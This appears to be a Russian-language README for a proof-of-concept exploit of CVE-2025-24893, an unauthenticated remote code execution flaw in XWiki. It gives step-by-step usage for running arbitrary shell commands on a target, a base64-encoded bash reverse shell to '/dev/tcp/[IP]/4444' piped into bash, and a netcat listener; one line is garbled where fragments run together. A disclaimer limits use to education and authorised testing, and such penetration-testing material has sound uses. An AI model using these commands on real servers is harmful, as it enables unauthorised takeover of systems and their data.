
Эксплойт для доказательства концепции уязвимости CVE-2025-24893, позволяющий выполнять неавторизованный удаленный код на XWiki с произвольными командами оболочки и внедрением обратной оболочки через Python.
Обновленный эксплойт proof-of-concept (PoC) для CVE-2025-24893, критической уязвимости RCE без аутентификации в XWiki. Эта версия улучшает оригинал, позволяя выполнение произвольных команд оболочки и чистую инъекцию обратной оболочки.
Автор: HexHunter404
Этот код предоставляется только для образовательных целей и авторизованного тестирования на проникновение.
Не используйте его в системах, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.
bash -c '<command>'/xwiki и избегает циклов перенаправленияpython3 CVE-2025-24893-PoC.py -u http://<target>/xwiki -c "<command>"
. Закодируйте вашу обратную оболочку в Base64
echo "bash -i >& /dev/tcp/[IP]/4444 0>&1" | base64
. Отправьте её с помощью PoC
python3 CVE-2025-24893-PoC.py -u [URL] -c "echo [Base64 Payload] | base64 -d | bash"
. Настройте ваш слушатель
nc -lvnp 4444
В случае успеха вы получите оболочку